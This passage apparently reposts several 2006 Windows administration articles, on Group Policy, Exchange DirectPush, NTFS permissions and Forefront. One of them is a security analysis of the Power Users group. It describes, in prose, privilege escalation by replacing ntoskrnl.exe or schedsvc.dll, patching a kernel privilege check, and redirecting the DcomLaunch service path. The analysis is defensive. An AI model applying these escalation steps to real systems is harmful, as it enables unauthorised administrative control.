What the No Override option does is prevents a higher level policy from changing anything that is set in the policy with the no override option set. The higher level policy can enforce new settings, but it can’t change existing settings. For example, let’s pretend that there are two policies in effect. A local computer policy sets a minimum password length of six characters and has the no override option set. A domain level policy sets the minimum password length to eight characters and sets the maximum password age to 30 days. The effective policy would mandate a six character password that expires every 30 days. The six character password remains in effect because the no override option is in effect. The 30 day expiration period is in effect because the lower level policy didn’t specify an expiration period, so the higher level policy isn’t overriding the lower level policy by setting an expiration period, it is merely adding to the policy.

Another group policy feature that you should use sparingly is the Block Inheritance feature. The basic idea here is that if you want to insure that a policy does not pick up settings from a lower level policy, then you can enable Block Inheritance.

In most cases, I would recommend never using the No Override or Block Inheritance features. They do have their place though. Although I have personally never tried it, I have heard other administrators talk about using No Override and Block Inheritance to help prevent group policies from interfering with the system policies used by older Windows operating systems.

ConclusionThese are just a few of the things that you can do to help make sure that your group policies stay organized and run as efficiently as possible. If there is enough interest, I might possibly write a follow up article discussing some more best practices.

About Brien PoseyBrien Posey is an award winning author who has written over 3,000 articles and written or contributed to 27 books. You can visit Brien’s personal Web site at www.brienposey.com

A look at the Microsoft DirectPush technology

2006-11-21T20:52:00.003-08:00

IntroductionPrior to Exchange 2003 SP2, you had two choices for synchronizing a mobile device with a mailbox; you could manually configure ActiveSync on the mobile device to issue synchronization on a scheduled basis, or you could make use of the Always-up-to-date (AUTD) technology. The problem with scheduled synchronizations is that you cannot schedule them for intervals less than five minutes, which means you will not always have the latest information on your device. Another problem is that you (depending on your mobile operator) will be charged for each established session, as new data will travel over the wire, each time a new session is established.

AUTD makes it possible to keep your device up to date by generating an Exchange store event in the user’s mailbox. When the store event detects a change in the mailbox, it triggers a Short Message Service (SMS) control message, which is then sent to the user’s mobile device. When the device receives the SMS message it initiates synchronization with the Exchange server. The idea behind the AUTD technology is good, but unfortunately it doesn’t work very well in reality, at least not in Europe where very few mobile operators supports AUTD. Microsoft IT became aware of this problem, when they deployed Exchange 2003 based mobile messaging in their own organization – an organization spread all over the world.

Based on customer feedback regarding the limitations of using SMS to notify a supported device, Microsoft improved the AUTD experience in Exchange Server SP2 based on the following goals:

A standard data plan is the only subscription you need to synchronize with Exchange (which must work globally) No need to deploy additional infrastructure in your Exchange environment No need for SMS notification or any other “out-of-band” schemes No special configuration on the deviceAnd this is basically what the Exchange DirectPush technology delivers. Microsoft has been testing this new technology on their own servers for a while, and with great results. The DirectPush technology keeps your mobile device up-to-date by delivering e-mail, Calendar, Contacts and Tasks directly to your device, allowing you to react quickly to changes in your mailbox. AUTD v1 did the same thing but DirectPush offers several benefits.

Note:
When enabling DirectPush on the Exchange 2003 Server, devices that are currently configured to use AUTD v1 are automatically switched/migrated from AUTD v1 to DirectPush. This means you don’t need to reconfigure anything on the device after enabling the feature.

The cool thing about the DirectPush technology is that it maintains an HTTPS connection between the Exchange server and the mobile device, a session which is kept alive by using heartbeats. This way the Exchange server can notify a mobile device whether or not there’s a change in the associated mailbox, and if a change occurs in the mailbox, the server can initiate a synchronization. Since the device keeps an open session to the Exchange server, some of you might think this could become rather expensive. But fear not because the device simply sits there and waits for a response, it doesn’t send or receive any data when it’s in this pending state. Said in another way, no data will travel over the wire, unless a change is detected in the mailbox, or the heartbeat expires. To get a more visualized picture of how the DirectPush technology works, see Figure 1 below.

Figure 1: Overview of the DirectPush Technology

Because the mobile device doesn’t send any empty syncs, as is the case with scheduled or manual syncs, the device reduces its power consumption which again increases battery life. Additionally data charges are reduced significantly. It’s also worth noting that any data synchronized between the mailbox and the devices are compressed using GZIP compression.

DirectPush requirements Server-side
As the DirectPush feature is a new technology included in Exchange 2003 SP2, it’s required that you apply Exchange 2003 SP2 at least on the Exchange 2003 front-end servers in your organization. Note that I say front-end servers, because your back-end servers can run anything from Exchange 2003 RTM, SP1 to SP2 as long as you have one or more front-end servers with SP2 applied. But although DirectPush doesn’t require it, I still recommended you upgrade the back-end servers to SP2 as well, not because you will gain any advantage out of doing so when it comes to the DirectPush technology, but because the service pack is packed with new great features and improvements as well as a lot of bug fixes. You can read more about the stuff included in Exchange 2003 SP2 in a previous article of mine.

Note:
In addition to the above requirements it’s highly recommended you adjust the time-out values for HTTPS connection in your firewall (more on this later in the article).

In order to properly secure Exchange ActiveSync, it's best practice, as well as my personal recommendation, to publish the service using an ISA Server 2004 firewall, see Figure 2 below for a general best practice scenario.

Figure 2: Microsoft DirectPush Topology

Client-side
Another requirement in order to make use of the DirectPush technology is that the mobile devices need to run Windows Mobile 5.0. In addition the devices need to have the Messaging and Security Feature Pack (MSFP) installed. Although Microsoft shipped firmware that included the MSFP to mobile device manufactures back in October 2005, new firmware releases with the MSFP included have been heavily delayed. But March 2006 seemed to be the month where things started to kick off. Both i-mate and Qtek as well as Orange have finally released new firmware updates with the MSFP included, although so far only for their newer models.

Note:
The Messaging and Security Feature Pack (MSFP) is also known as the Adaption Kit Update 2 (AKU2).

Enabling DirectPush on the Exchange 2003 Server(s)When Exchange 2003 SP2 has been applied, the DirectPush feature will be enabled by default. The feature can be found in the same place as the other Exchange mobility features are located, which is on the property page of the Mobile Services object in the Exchange System Manager (see Figure 3 below).

Figure 3: Enabling DirectPush in the Exchange System Manager

Note that even though the DirectPush feature has been enabled, mobile devices without the MSFP installed are still capable of doing synchronizations using either the manual and/or scheduled methods, or via AUTD.

Exchange 2003 Server heartbeat time-out valuesIn order to maintain a persistent connection between an Exchange server and a mobile device, DirectPush makes use of so called heartbeat intervals. This is so that the server can keep a connection open to a device all the time, even though no changes occur in a mailbox. The Exchange server adjusts this heartbeat interval automatically, it keeps the last heartbeat interval received from a device. But you can also configure the value for the heartbeat intervals in a set of registry keys on the Exchange server, although it shouldn’t be nescessary. For details on how you configure these values, I recommend you take a look at MS KB article 905013.

Firewall considerationsIn order to maximize performance as well as provide a better always-up-to-date experience for the end-users, it’s highly recommended that you increase the time-out values for HTTPS connections on your firewall. Depending on what type of firewall is used in your organization, this is of course done differently. For steps on how to do so on an ISA Server 2004 firewall see MS KB article 905013, these steps should give you an idea of how you should approach this with another firewall product as well.

Note:
Failing to set the time-out on the firewall to minimum 15 minutes (MS recommends 30 minutes) will among other things result in poor battery life time on the mobile devices as well as increase data transfers over the wire.

Enabling DirectPush on the mobile deviceIt’s time to see what is required on the mobile device in order to get it to synchronize with the Exchange server using DirectPush. Let me be honest and tell you there’s nothing new when it comes to configuring ActiveSync on the device, actually you only need to enable Microsoft DirectPush under the Comm Manager as shown in Figure 4 below, and the device will issue an HTTP (ping) request to the Exchange server and we’re pretty much there.

Figure 4: DirectPush on a mobile device with the MSFP installed

When DirectPush has been activated on the device, an icon consisting of two small vertical arrows appears in the top right corner of the screen (see Figure 5). When a change is detected in the mailbox, or if the heartbeat expires, the server will issue a response back to the device, which will then do a synchronization of the respective mailbox, or re-issue an HTTP request.

Figure 5: DirectPush enabled on the mobile device

DirectPush Performance CountersWhen you install Exchange 2003 SP2 on an Exchange Server, several DirectPush related performance counters are added to the server as well. These counters can be found under the Microsoft Exchange ActiveSync performance object, as can be seen in Figure 6 below.

Figure 6: DirectPush related performance counters

Notice all the counters measuring so called Ping commands. Ping (which shouldn’t be confused with a traditional Ping command) is the command or request that’s sent by the mobile device to the server via an HTTP(S) connection. This request will then be in a pending state until a change occurs in a mailbox, or until the heartbeat interval expires.

As with any other performance counter you can get a description of each DirectPush related counter by marking it, then click the Explain button (see Figure 6).

ConclusionThe new DirectPush technology provides a much richer experience for your end-users, and even though DirectPush isn’t real push technology (like is the case with RIM’s Blackberry product), the end-user will never notice as it is a matter of seconds before a change occurring in a mailbox (e-mail, calendar, contacts and tasks) is synchronized to a mobile device. Due to the fact that the DirectPush technology is an integrated part of Exchange 2003 Servers with SP2 applied, the investments required can be kept at a minimum, as the only thing you need to invest in is mobile devices running Windows Mobile 5.0 and have the MSFP installed.

In part 2 of this article series we’ll uncover the new mobile device password policies included in Exchange 2003 SP2.

If you would like to be notified when Henrik Walther releases Exchange 2003 Mobile Messaging Part 2 please sign up to our MSExchange.org Real-Time Article Update newsletter.

Related readingEnterprise firewall configuration for Exchange ActiveSync Direct Push Technology:
http://support.microsoft.com/Default.aspx?id=905013

Microsoft Exchange Server: Mobility in Exchange Server 2003:
http://www.microsoft.com/exchange/evaluation/features/mobility/default.mspx

Windows Mobile 5.0 Messaging and Security Feature Pack:
http://www.microsoft.com/windowsmobile/business/5/default.mspx

New Mobility Features in Exchange Server 2003 SP2:
http://www.microsoft.com/technet/prodtechnol/exchange/2003/sp2mobility.mspx

About Henrik Walther Henrik Walther is a Microsoft Exchange MVP and MCSE Security/Messaging that works as a System specialist for Interprise Consulting A/S, a Microsoft Gold Partner based in Denmark. You can visit his website at: www.exchange-faq.dk (danish).

Click here for Henrik Walther's section.

The Power in Power Users

2006-11-21T20:52:00.001-08:00

Placing Windows user accounts in the Power Users security group is a common approach IT organizations take to get users into a least-privilege environment while avoiding the many pains of truly running as a limited user. The Power Users group is able to install software, manage power and time-zone settings, and install ActiveX controls, actions that limited Users are denied.

What many administrators fail to realize, however, is that this power comes at the price of true limited-user security. Many articles, including this Microsoft Knowledge Base article and this blog post by Microsoft security specialist Jesper Johansen, point out that a user that belongs to the Power Users group can easily elevate themselves to fully-privileged administrators, but I was unable to find a detailed description of the elevation mechanisms they refer to. I therefore decided to investigate.

Before I could start the investigation, I had to define the problem. In the absence of a security flaw such as a buffer overflow privilege escalation is possible only if an account can configure arbitrary code to execute in the context of a more-privileged account. The default accounts that have more privilege than Power Users include Administrators and the Local System account, in which several Windows service processes run. Thus, if a Power Users member can modify a file executed by one of these accounts, configure one of their executables to load an arbitrary DLL, or add an executable auto-start to these accounts, they can obtain full administrative privileges.

My first step was to see what files and directories to which the Power Users group has write access, but that limited users do not. The systems I considered were stock Windows 2000 Professional SP4, Windows XP SP2, and Windows Vista. I'm not going to bother looking at server systems because the most common Power Users scenario is on a workstation.

The brute force method of seeing what file system objects Power Users can modify requires visiting each file and directory and examining its permissions, something that’s clearly not practical. The command-line Cacls utility that Windows includes dumps security descriptors, but I’ve never bothered learning Security Descriptor Description Language (SDDL) and parsing the output would require writing a script. The AccessEnum utility that Bryce wrote seemed promising and it can also look at Registry security, but it’s aimed at showing potential permissions weaknesses, not the accesses available to particular accounts. Further, I knew that I’d also need to examine the security applied to Windows services.

I concluded that I had to write a new utility for the job, so I created AccessChk. You pass AccessChk an account or group name and a file system path, Registry key, or Windows service name, and it reports the effective accesses the account or group has for the object, taking into consideration the account’s group memberships. For example, if the Mark account had access to a file, but Mark belongs to the Developers group that is explicitly denied access, then AccessChk would show Mark as having no access.

In order to make the output easy to read AccessChk prints ‘W’ next to the object name if an account has any permissions that would allow it to modify an object, and ‘R’ if an account can read the object’s data or status. Various switches cause AccessChk to recurse into subdirectories or Registry subkeys and the –v switch has it report the specific accesses available to the account. A switch I added specifically to seek out objects for which an account has write access is –w.

Armed with this new tool I was ready to start investigating. My first target was a Windows XP SP2 VMWare installation that has no installed applications other than the VMWare Tools. The first command I executed was:

accesschk –ws “power users” c:\windows

This shows all the files and directories under the \Windows directory that the Power Users group can modify. Of course, many of the files under \Windows are part of the operating system or Windows services and therefore execute in the Local System account. AccessChk reported that Power Users can modify most of the directories under \Windows, which allows member users to create files in those directories. Thus, a member of the Power Users group can create files in the \Windows and \Windows\System32 directory, which is a common requirement of poorly written legacy applications. In addition, Power Users needs to be able to create files in the \Windows\Downloaded Program Files directory so that they can install ActiveX controls, since Internet Explorer saves them to that directory. However, simply creating a file in these directories is not a path to privilege elevation.

Despite the fact that Power Users can create files underneath \Windows and most of its subdirectories, Windows configures default security permissions on most files contained in these directories so that only members of the Administrators group and the Local System account have write access. Exceptions include the font files (.fon), many system log files (.log), some help files (.chm), pictures and audio clips (.jpg, .gif, and .wmv) and installation files (.inf), but none of these files can be modified or replaced to gain administrative privilege. The device drivers in \Windows\System32\Drivers would allow easy escalation, but Power Users doesn’t have write access to any of them.

I did see a number of .exe’s and .dll’s in the list, though, so I examined them for possible exploits. Most of the executables for which Power Users has write access are interactive utilities or run with reduced privileges. Unless you can trick an administrator into logging into the system interactively, these can’t be used to elevate. But there’s one glaring exception: ntoskrnl.exe:

That’s right, Power Users can replace or modify Windows’ core operating system file. Five seconds after the file is modified, however, Windows File Protection (WFP) will replace it with a backup copy it retrieves, in most cases, from \Windows\System32\Dllcache. Power Users doesn’t have write access to files in Dllcache so it can’t subvert the backup copy. But members of the Power Users group can circumvent WFP by writing a simple program that replaces the file, flushes the modified data to disk, then reboots the system before WFP takes action.

I verified that this approach works, but the question remained of how this vulnerability can be used to elevate privilege. The answer is as easy as using a disassembler to find the function that Windows uses for privilege checks, SeSinglePrivilegeCheck, and patching its entry point in the on-disk image so that it always returns TRUE, which is the result code that indicates that a user has the privilege being checked for. Once a user is running on a kernel modified in this manner they will appear to have all privileges, including Load Driver, Take Ownership, and Create Token, to name just a few of the privileges that they can easily leverage to take full administrative control of a system. Although 64-bit Windows XP prevents kernel tampering with PatchGuard, few enterprises are running on 64-bit Windows.

Replacing Ntoksrnl.exe isn’t the only way to punch through to administrative privilege via the \Windows directory, however. At least one of the DLLs for which default permissions allow modification by Power User, Schedsvc.dll, runs as a Windows service in the Local System account. Schedsvc.dll is the DLL that implements the Windows Task Scheduler service. Windows can operate successfully without the service so Power Users can replace the DLL with an arbitrary DLL, such as one that simply adds their account to the Local Administrators group. Of course, WFP protects this file as well so replacing it requires the use of the WFP-bypass technique I’ve described.

I’d already identified several elevation vectors, but continued my investigation by looking at Power Users access to the \Program Files directory where I found default permissions similar to those in the \Windows directory. Power Users can create subdirectories under \Program Files, but can’t modify most of the preinstalled Windows components. Again, the exceptions, like Windows Messenger (\Program Files\Messenger\Msmgs.exe) and Windows Media Player (\Program Files\Windows Media Player\Wmplayer.exe) run interactively.

That doesn’t mean that \Program Files doesn’t have potential holes. When I examined the most recent output I saw that Power Users can modify any file or directory created in \Program Files subsequent to those created during the base Windows install. On my test system \Program Files\Vmware\Vmware Tools\Vmwareservice.exe, the image file for the Vmware Windows service that runs in the Local System account, was such a file. Another somewhat ironic example is Microsoft Windows Defender Beta 2, which installs its service executable in \Program Files\Windows Defender with default security settings. Replacing these service image files is a quick path to administrator privilege and is even easier than replacing files in the \Windows directory because WFP doesn’t meddle with replacements.

Next I turned my attention to the Registry by running this command:

accesschk –swk “power users” hklm

The output list was enormous because Power Users has write access to the vast majority of the HKLM\Software key. The first area I studied for possible elevations was the HKLM\System key, because write access to many settings beneath it, such as the Windows service and driver configuration keys in HKLM\System\CurrentControlSet\Services, would permit trivial subversion of the Local System account. The analysis revealed that Power Users doesn’t have write access to anything significant under that key.

Most of the Power Users-writeable areas under the other major branch of HKLM, Software, related to Internet Explorer, Explorer and its file associations, and power management configuration. Power Users also has write access to HKLM\Software\Microsoft\Windows\CurrentVersion\Run, allowing them to configure arbitrary executables to run whenever someone logs on interactively, but exploiting this requires a user with administrative privilege to log onto the system interactively (which, depending on the system, may never happen, or happen infrequently). And just as for the \Program Files directory, Power Users has default write access to non-Windows subkeys of HKLM\Software, meaning that third-party applications that configure executable code paths in their system-wide Registry keys could open security holes. VMWare, the only application installed on the system, did not.

The remaining area of exploration was Windows services. The only service permissions AccessChk considers to be write accesses are SERVICE_CHANGE_CONFIG and WRITE_DAC. A user with SERVICE_CHANGE_CONFIG can configure an arbitrary executable to launch when a service starts and given WRITE_DAC they can modify the permissions on a service to grant themselves SERVICE_CHANGE_CONFIG access. AccessChk revealed the following on my stock Windows XP SP2 system:

I next ran PsService to see the account in which the DcomLaunch service executes:

Thus, members of the Power Users group can simply change the image path of DComLauncher to point at their own image, reboot the system, and enjoy administrative privileges.

There can potentially be other services that introduce exploits in their security. The default permissions Windows sets on services created by third-party applications do not allow Power Users write access, but some third party applications might configure custom permissions to allow them to do so. In fact, on my production 64-bit Windows XP installation AccessChk reveals a hole that not only Power Users can use to elevate themselves, but that limited users can as well:

I’d now finished the major phase of my investigation and just confirmed what everyone has been saying: a determined member of the Power Users group can fairly easily make themselves full administrator using exploits in the operating system and ones created by third-party applications.

My final step was to see how Microsoft’s approach to the Power Users account has evolved over time. This 1999 Microsoft Knowledge Base article documents the famous screen-saver elevation vulnerability that existed on Windows NT 4, but Microsoft closed that hole before the release of Windows 2000. The KB article also shows that Microsoft was apparently unaware of other vulnerabilities that likely existed. Windows 2000 SP4 also includes holes, but is actually slightly more secure than the default Windows XP SP2 configuration: Power Users don’t have write access to Ntoskrnl.exe or the Task Scheduler image file, but instead of write-access to the DComLauncher service they can subvert the WMI service, which also runs in the Local System account.

Windows XP SP1 added more Power Users weaknesses, including write access to critical system files like Svchost.exe, the Windows service hosting process, and additional services, WMI and SSDPSRV, with exploitable permissions. Several services even allowed limited users to elevate as described in this Microsoft KB article from March of this year.

Microsoft’s newest operating system, Windows Vista, closes down all the vulnerabilities I’ve described by neutering Power Users so that it behaves identically to limited Users. Microsoft has thus closed the door on Power Users in order to force IT staffs into securing their systems by moving users into limited Users accounts or into administrative accounts where they must acknowledge end-user control over their systems.

The bottom line is that while Microsoft could fix the vulnerabilities I found in my investigation, they can’t prevent third-party applications from introducing new ones while at the same time preserving the ability of Power Users to install applications and ActiveX controls. The lesson is that as an IT administrator you shouldn’t fool yourself into thinking that the Power Users group is a secure compromise on the way to running as limited user.

Securing Windows 2000 Server

2006-11-21T20:51:00.003-08:00

This Securing Windows 2000 Server solution reinforces the Microsoft Trustworthy Computing initiative by providing structured guidance to help you understand, evaluate, and address security issues in Microsoft® Windows® 2000 Server environments. This prescriptive solution is designed to help reduce security vulnerabilities and lower the costs of security management.

The guidance provides advice to help secure your Windows 2000 Server environment throughout the IT life cycle. It includes information about risk assessment and analysis, securing specific critical Windows 2000 Server roles, and operating a secure environment after the initial lockdown phases have completed.

详细信息：

In This Article
• Overview
• Chapter 1: Introduction to Securing Windows 2000 Server
• Chapter 2: Defining the Security Landscape
• Chapter 3: Understanding the Security Risk Management Discipline
• Chapter 4: Applying the Security Risk Management Discipline
• Chapter 5: Securing the Domain Infrastructure
• Chapter 6: Hardening the Base Windows 2000 Server
• Chapter 7: Hardening Specific Server Roles
• Chapter 8: Patch Management
• Chapter 9: Auditing and Intrusion Detection
• Chapter 10: Responding to Incidents
• Chapter 11: Conclusion
• Appendix A: Purpose of Microsoft Windows 2000 Services
• Appendix B: Registry Access Control Changes
• Appendix C: Disabling NetBIOS on Servers in Untrusted Networks
• Appendix D: Configuring Digital Certificates on Domain Controllers

Understanding Windows NTFS Permissions

2006-11-21T20:51:00.001-08:00

Understanding Windows NTFS PermissionsEven though Windows permissions have been around for a long time, I still run into seasoned network administrators that aren’t aware of the new changes that came with Windows 2000 so long ago. When Microsoft released Windows 2000, they released a new version of NTFS, which was versioned 5. The new NTFS permissions were essentially the same logical control as the older version that was available in Windows NT, however, there were some radical and essential changes that occurred to control how the permissions were inherited and configured for each file and folder. Since NTFS permissions are available on every file, folder, Registry key, printer, and Active Directory object, it is important to understand the new methods and features that are available once you have Windows 2000, Windows XP, or Windows 2003 Server installed to control resources.

Standard PermissionsStandard permissions are those permissions that control a broad range of detailed permissions. The most popular and infamous standard permission is Full Control. This is what everyone wants, but in reality very few should get. Full Control allows the user that is granted this suite of permissions to do virtually anything to the object the permissions are associated with. The other standard permissions include the following:

Files:

Modify
Read & Execute
Read
Write

Folders have the same standard permissions as files, except there is one additional standard permission “List Folder Contents.”

When you look at Registry keys, printers, and Active Directory objects, there is a totally different set of standard permissions for these objects. The security tab of each object will list the standard permissions, as shown in Figure 1 for a typical organizational unit (OU) within Active Directory.

Figure 1: Standard permissions for an OU in Active Directory

Advanced PermissionsAdvanced permissions are the detailed permissions that are grouped together to create the standard permissions. Since advanced permissions are used in combinations to create the standard permissions, there are more of them overall. For a file, here is a list of the advanced permissions:

Full Control
Traverse Folder/Execute File
List Folder/Read Data
Read Attributes
Read Extended Attributes
Create Files/Write Data
Create Folders/Append Data
Write Attributes
Write Extended Attributes
Delete
Read Permissions
Change Permissions
Take Ownership

For example, the specific advanced permissions that are used to create the Read standard permission include:

List Folder/Read Data
Read Attributes
Read Extended Attributes
Read Permissions

When you evaluate the advanced permissions for a folder, they are identical to those of a file. However, when you investigate the advanced permissions of a printer or Registry key, they are completely different. If you want to see the power and control that NTFS 5.0 provides for access control, it is best to investigate the permissions of an OU within Active Directory. Upon first glance, I calculate that you have over 10,000 individual advanced permissions that you can set for an OU, as you can see a partial listing in Figure 2.

Figure 2: Advanced permissions for an OU in Active Directory

Inherited vs. Explicit PermissionsThere are two variations of permissions that you will see for any one entry (user, computer, or group) listed on the access control list (ACL). If we look at the root drive, C:, you can add or modify the permissions for any entry on the ACL. If you create a new folder under C:, say a new folder named Data (C:\Data), you won’t be able to modify the permissions for any existing entries. This is because the permissions from C: inherit down to all subfolders and files automatically. If you don’t want the permissions from C: to inherit down the C:\Data, but still want them to inherit down to other subfolders below C:, you would configure the C:\Data folder to stop inheriting by removing the check from the “Inherit from parent the permission entries that apply to child objects. Include these with entries explicitly defined here,” as shown in Figure 3.

Figure 3: You can control inherited permissions on any folder or file

At any level within the resource structure, you can always add new entries to the ACL. These entries, specifically for the target resource, are called explicit permissions, since they are configured directly on the resource. If the default inheritance is enabled for subfolders and files, these explicit permissions will inherit down to subsequent resources, like the original permissions did from C:\ down to C:\Data. It is easy to tell the difference between inherited permissions and explicit permissions, by the check mark on the permissions for the entry. If the check is not grayed out, the permissions are explicit.

Allow vs. Deny PermissionsWhen establishing permissions, you need to specify whether the entry should have access (Allow) or not (Deny) to the resource. The Local Security Authority (LSASS) then controls the access to the resource, based on the security ID (SID) that you placed on the ACL to the SID placed on the security token that is given to the user at logon. If the SID associated with the user is on the ACL, the LSASS must determine whether the access is set to Allow or Deny. The Allow and Deny permissions inherit down through the structure as described in the section above on inheritance.

You will get warnings from the ACL editor when you create Deny entries, as shown in Figure 4.

Figure 4: Deny entries on the ACL will cause the system to warn you about the limited access you are providing

It is not common to configure resources with Deny permissions, because of the nature of how permissions are evaluated. It is more common to exclude the user or group from the ACL instead of configuring them to have explicit Deny permissions. The fact that the user or group SID is not on the ACL will have the same result of “No Access” to the resource, without needing to configure any special entries on the ACL. It is only in the rare instance that a user or group should be explicitly denied access that you configure Deny permissions. Denial of access to resources by omission from the ACL is easier to troubleshoot, manage, and configure.

Permission PrecedenceI hear all of the time from students and other network administrators (even the dialog box in Figure 4) that Deny permissions take precedence over Allow permissions. Unfortunately, this is not always the case. To prove my point, let’s look at a scenario that you too can create to prove that Deny permissions don’t always take precedence over Allow permissions.

In our scenario, we are going to look at a folder, C:\Data\HR, which contains both public and private files. We have allowed the C:\Data\HR folder to inherit the permissions from C:\Data, which includes just basic permissions from the root folder. We have also included the HR group on the ACL, giving the Group Allow-Read & Execute permissions. The final explicit entry on the ACL is for the non-HR group, which is given Deny-Full Control.

Below the HR folder are two files: Public.doc and Private.doc. The Public folder just allows for normal permission inheritance, so there are no special permissions added to the ACL. However, the private file has some explicit permissions added to the ACL. Since the Executive group needs to be able to read the contents of the private folder, this group is added explicitly with the Allow-Read & Execute permission. The result of this configuration is shown in Figure 5, which clearly shows that the Allow permission for the Executive group has a higher precedence than the Deny permission associated with the non-HR group. Since every executive is included in both groups, you can see that here is a case where Allow permissions have precedence over Deny permissions.

Figure 5: Allow permissions can have precedence over Deny permissions

The scenario proves that there is a hierarchy of permissions for NTFS 5.0 resources. The hierarchy of precedence for the permissions can be summarized as follows, with the higher precedence permissions listed at the top of the list:

Explicit Deny
Explicit Allow
Inherited Deny
Inherited Allow

SummaryPermissions are almost the same from Windows NT’s NTFS 4.0 to Windows 2000/XP/2003’s NTFS 5.0. One of the main differences is the way that permissions inherit down through the structure with inherited and explicit permissions. It used to be that, if there was a Deny permission on the ACL, it was always evaluated first, then the Allow permissions would follow. Now, the permission hierarchy must be evaluated considering not only the Deny vs. Allow, but whether the permission is explicitly set or inherited down from a parent resource.

About Derek Melber Derek Melber , MCSE, MVP, CISM

Derek is the Director of Compliance Solutions for DesktopStandard. Derek has written the only books on auditing Windows security available at www.theiia.org’s bookstore. Derek also wrote the Group Policy Guide for MSPress, which is the only book Microsoft has written regarding Group Policy. If you have a question for Derek, contact him at derekm@desktopstandard.com.

An Introduction to Microsoft Forefront

2006-11-21T20:49:00.003-08:00

If you would like to be notified of when Ricky Magalhaes releases part two of this article series, please sign up to our WindowSecurity.com Real-Time Article Update newsletter.

Microsoft has decided to take a proactive security approach for some time now and after much criticism and condemnation from the IT security fraternity, the organization has once again come out with a suite of products that will evolve into day facto standard in most enterprises that already run other Microsoft products. Some of the security products that Microsoft have in the security suite like Microsoft ISA 2006 we are already familiar with, however a new wave of server and client security software is promised later in 2006 and early in 2007.

Microsoft has re-branded its security portfolio to Forefront, this includes ISA 2006, Antigen Antivirus and anti-spam solution as well as the client security offering. Forefront has particular focus on Edge security, server security, client security and access control, included in this is the identity management product that will incorporate into Active directory MIIS (Microsoft Identity Integration Server). This product not only controls user access but applications developed by the organization can also be controlled like users.

Forefront was designed to simplify the security deployment and to consolidate management of security products all under one console and reporting using one backend MS SQL.

Threat MatrixBecause threats have become profit motivated, it is time organizations take their security more seriously. Many people think that organizations and in the frame of reference banks and financial institutions come to mind, when in actual fact all organizations that deal with customers should take security seriously as customer data and information regarding the customer can be used against the customer or the organization.

For example when a customer buys a car from Dealer X, all the client information is captured into the client database at Dealer X. Dealer X decides to get a wireless access point for internet access, a passerby discovers the access point and that no security has been used in the implementation of the solution. The passerby has an agenda and would like to get information that is stored on the database. With a free sniffer, downloaded off the internet, the passerby discovers that information flowing on the LAN is in clear text, combine with that, the username and password to the database. The passerby connects to the database, copies it for later access and the clients' details are now on the passerby’s computer. Unlikely you may think, but I have known of such companies in the local market that I am part of. All of which can be remedied by Forefront, technology this organization already owns.

(Courtesy of Microsoft)
Figure 1: Depicts how Forefront, depicted in BLUE, fits into the Microsoft product portfolio

Microsoft asks the consumer for feature setAfter much analysis it seems that Microsoft have innovated a suite of products that fit the requirements of most organizations that require protection for their Microsoft environments. From unified security view of the network to a common security vulnerability checker for Microsoft products.

Addressing the CIAConfidentiality, integrity and availability: the three security pillars. How does Forefront fit into CIA? In terms of confidentiality, encryption will be the method that will be used to keep files confidential. This is possible with EFS (Encryption file system) using certificates that you need to make a backup of in case you lose the certificate that you initially used. For more information about this, visit http://support.microsoft.com/kb/307877, http://support.microsoft.com/kb/223316/en-us.
There are more articles about encryption to be found on our site http://www.windowsecurity.com/articles_tutorials/authentication_and_encryption/

In terms of integrity, the security professional will need to ensure that access to information is controlled and regulated. Periodic monitoring of file and data access is important as this ensures that the data is not tampered with. Strict access control and data classification can help with this. With Microsoft’s authentication technologies, strong authentication mechanism can be achieved and centrally controlled. Included in this approach, the security professional can use windows rights management services to ensure that only users with rights can manipulate files implicitly allowed.

Availability is imposed by implementing strong monitoring mechanisms like MOM that notify the security professionals of downtime and factors like events that may cause downtime like disc space utilization and firewall service availability. If your systems are unavailable due to uncontrolled factors like unplanned downtime because of issues like hacking, defacement, power interruption etc… they are not secured. Downtime can impact customer relationships and can negatively impact productivity.

How do they do itBeta testing, surveys and HoneyMonkeys are the answer. HoneyMonkeys? You say this, precisely what the strider project is about down at the Microsoft researcher labs? HoneyMonkeys are virtual machines that have been setup by researches at the labs that have different patch levels on them and that interact automatically with the websites hosting malicious code simulating user activity. This is similar to a honeypot but more interactive, thus called a HoneyMonkey. More on Honeymonkeys in future articles. Visit http://research.microsoft.com/HoneyMonkey/ for more information on HoneyMonkeys.

Microsoft reported at Tech-Ed 2006 that there were 2.7 billion executions of the newly released malware detection product. Seems like this anti-malware product is popular. Included in this is a EULA (End User License Agreement) that the user accepts and after which, no user identifiable information is sent back to Microsoft except information about the malware detected and the locale of where this happened. This information transaction has to comply with strict privacy policies and the information is analyzed and reported on to produce as statistical reference that helps in combating future infections of such outbreaks. More information and a video can be viewed at the website link below:

http://virtualteched.com/archive/2006/06/12/74.aspx

New problems old solutions?By now I am sure you are asking what the benefits are of the Forefront. Forefront promises to centrally manage Microsoft security with a dashboard type view. This will include information like patching level of client machines as well as information of the security or lack of security configuration of each client machine. Unified reporting and console management for glance view control seems to be the order of the day with Forefront.

What about MOM?There are certain key elements that a security professional needs to monitor on an ongoing basis to ensure that the network is running free of compromises. Intruders often target the log files and audit logs because they know that, if an experienced security professional reads the logs, they might be suspected or even traced. Most of the time it is a tedious process to read the logs as they are not central and spread over many computers. This can take a considerable amount of time especially when filtering out the noise. Furthermore, if there is no record that a specific action took place it becomes incredibly challenging to prove that the action in fact took place. It is important to establish key security trends.

Looking for a monitoring application that has customizable log consolidation capabilities is important as this will help the security professional consolidate the logs on a daily basis to get the exact information that you will be looking for. The world of software automation has saved security administrators millions of hours. Reporting regularly should highlight the events that pertain to your specific network environment. Failed logons, bad user names or passwords, account lockouts, logon after certain typical periods (like in the middle of the night), and failed resource access events all point to potential security risks and these events should be investigated and validated with the users concerned. Products like MOM from the Microsoft Forefront security suite help in this regard.

Management packs for ISA 2006, antigen and Forefront are included for monitoring using MOM. As MOM becomes more and more scalable, Microsoft provides management packs for different software. This is the case for the security software that forms part of the Forefront Security Suite. These management packs help when monitoring environment variables but, be warned, special attention needs to be paid to configuring MOM correctly to achieve the results you want when monitoring your organization. There are no silver bullets or holy grails, it’s more a combination of strategies and security systems that help with defense in-depth.

Malware, spyware, greywareWith signature updates and new alerting functionality, Microsoft has a new system that can inform the security professional of potential issues. Included in the suite is the long awaited malware, spyware remover. Because Microsoft built the OS, the new removal tool knows what should be installed and what should not so restoration of normality is promised to be a click away.

